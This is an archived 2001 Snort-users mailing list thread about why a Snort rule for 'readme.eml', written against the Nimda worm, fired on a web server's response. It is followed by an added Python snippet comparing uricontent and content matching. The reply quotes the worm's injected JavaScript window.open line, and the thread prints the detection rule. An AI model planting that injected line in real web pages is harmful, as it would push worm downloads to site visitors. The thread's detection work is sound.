From: Tim Kramer (kramertmlrnoc.navy.mil)
Date: Fri Nov 02 2001 - 21:07:55 CST

    Dan,

    The "readme.eml" rule (in this case) was probably written
    in response to the Nimda worm which infects web servers so
    that they have an extra line of HTML/JavaScript code at the
    bottom of the web page. The additional code causes a new
    browser window to be opened well off the visible portion of
    the desktop (location 6000,6000) and to download a file
    called "readme.eml". The actual code that gets added to the
    webpage looks like (without the proper JavaScript tags):

    window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

    The act of visiting the infected website causes an additional
    HTTP request. This also makes it easy to detect (via Snort)
    and/or easy to block (via Squid).

    Hope this helps,
    Tim Kramer

    On Fri, 2001-11-02 at 13:21, dan.ellissophos.com wrote:
    > Hi,
    >
    > I'm not actually a snort user, but I'm trying to respond to a log I was
    > sent:
    >
    > Date:01/11 18:43:59 Name:WEB-MISC readme.eml attempt
    > Priority:8 Type:Attempted User Privilege Gain
    > IP info: xxx.xxx.xxx.xxx:80 -> yyy.yyy.yyy.yyy:62689
    > References: 1
    >
    > which apparently came from the rule:
    >
    > alert tcp $EXTERNAL_NET 80 -> $HOME_NET any \
    > (msg:"WEB-MISC readme.eml attempt"; \
    > flags:A+; uricontent:"readme.eml"; nocase; \
    > classtype:attempted-user; sid:1284; rev:3; \
    > reference:url,www.cert.org/advisories/CA-2001-26.html;)
    >
    > (xxx... is our web server.)
    >
    > I'm not very familiar with snort, but from what I've just read in the
    > documentation the 'uricontent' bit is supposed to match only on
    > the URI of requests. However, this was a response packet from our
    > web server. Of course, several of our pages contain the text "readme.eml",
    > but I don't see how this rule could have triggered unless it was
    > mistakenly matching as 'content' instead of 'uricontent'. Has 'uricontent'
    > been known to misbehave in this way?
    >
    > Any information greatly appreciated.
    >
    > Regards,
    > Dan.
    >
    >
    > --
    > Dan Ellis, Software Engineer Sophos Anti-Virus
    > email: dan.ellissophos.com http://www.sophos.com
    > US Support: +1 888 SOPHOS 9 UK Support: +44 1235 559933
    >
    >
    > _______________________________________________
    > Snort-users mailing list
    > Snort-userslists.sourceforge.net
    > Go to this URL to change user options or unsubscribe:
    > https://lists.sourceforge.net/lists/listinfo/snort-users
    > Snort-users list archive:
    > http://www.geocrawler.com/redir-sf.php3?list=snort-users

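Dan's uricontent-versus-content question and Tim's description of the injected window.open() line, as an added example that is not part of the original thread: a small Python matcher that applies the rule's "readme.eml" test the way uricontent should (request URI only) and the way content does (anywhere in the payload), run over two constructed packets, the extra GET a browser issues for readme.eml and an infected page's response carrying the injected line. The payloads and function names are assumptions for illustration.

```python
import re

# Constructed sample payloads (not from the original post). The first is the
# extra HTTP request a browser sends after parsing the injected window.open();
# the second is a server response whose body carries that injected line.
CLIENT_REQUEST = (
    b"GET /README.EML HTTP/1.0\r\n"
    b"Host: www.example.test\r\n\r\n"
)
SERVER_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><body>Welcome</body></html>\n"
    b'<script>window.open("readme.eml", null, '
    b'"resizable=no,top=6000,left=6000")</script>'
)

# An HTTP request line: METHOD SP URI SP HTTP/x.y. A response starts with
# "HTTP/x.y status reason" and therefore does not match.
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/\d\.\d\r?\n")


def uri_of(payload: bytes):
    """Return the request URI if the payload begins with a request line, else None."""
    m = REQUEST_LINE.match(payload)
    return m.group(2) if m else None


def uricontent_match(payload: bytes, needle: bytes, nocase: bool = True) -> bool:
    """Mimic 'uricontent': look only inside the request URI.
    A response packet has no URI, so it can never match here."""
    uri = uri_of(payload)
    if uri is None:
        return False
    return needle.lower() in uri.lower() if nocase else needle in uri


def content_match(payload: bytes, needle: bytes, nocase: bool = True) -> bool:
    """Mimic 'content': look anywhere in the packet payload."""
    return needle.lower() in payload.lower() if nocase else needle in payload


def classify(payload: bytes, needle: bytes = b"readme.eml") -> dict:
    """Report which of the two match modes would fire on this payload."""
    return {
        "uricontent": uricontent_match(payload, needle),
        "content": content_match(payload, needle),
    }
```

A response that fires only under the "content" key is the situation Dan describes: the text is present in the page body, but nothing in the packet is a request URI.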